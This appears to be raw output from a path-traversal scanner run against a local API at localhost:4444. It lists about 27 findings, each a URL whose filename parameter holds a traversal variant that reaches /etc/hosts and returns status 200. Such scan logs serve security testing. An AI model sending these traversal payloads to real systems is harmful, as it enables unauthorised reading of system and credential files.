
----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=//etc/hosts 
  Word: /etc/hosts
  Traversal Path: 
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../../../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../../../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../../.././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../../../.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../.../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../.../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../.././../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../.././..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../../././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../.././.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../.../../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./.../../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../.../.././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./.../../.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../..../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./..../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../..././../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./..././..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../.../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./.../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../.././../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./.././../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../.././.././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./.././../.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../.././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../../.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../../././../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../././..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../.././../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./.././..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/../.././././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ./../././.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/.../../../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ../../../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/.../../.././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ../../../.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/.../.././../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ../.././..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/.../../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ../../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/.../../././etc/hosts 
  Word: /etc/hosts
  Traversal Path: ../.././.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/..../../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: .../../..
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/..../.././etc/hosts 
  Word: /etc/hosts
  Traversal Path: .../../.
  Response code: 200


----------Potential Vulnerability found!!!----------
  URL: http://localhost:4444/api?filename=/...../../etc/hosts 
  Word: /etc/hosts
  Traversal Path: ..../..
  Response code: 200

